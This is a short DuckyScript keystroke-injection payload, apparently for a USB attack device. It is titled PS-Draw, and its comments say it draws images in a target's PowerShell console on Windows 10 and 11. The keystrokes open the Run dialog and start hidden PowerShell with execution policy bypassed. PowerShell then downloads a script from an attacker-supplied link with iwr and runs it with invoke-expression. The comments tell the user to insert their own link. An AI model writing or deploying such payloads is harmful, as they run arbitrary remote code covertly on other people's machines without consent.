REM     Title: PS-Draw
REM     Author: I am Jakoby
REM     Description: This payload is meant to draw images in your targets powershell console. See PS-Draw.ps1 for more details
REM     Target: Windows 10, 11
REM     Remember to replace the link with your link for the intended file to download
REM     Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly
REM     Download one of the two PS-Draw Execute files provided and execute it  
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl
ENTER
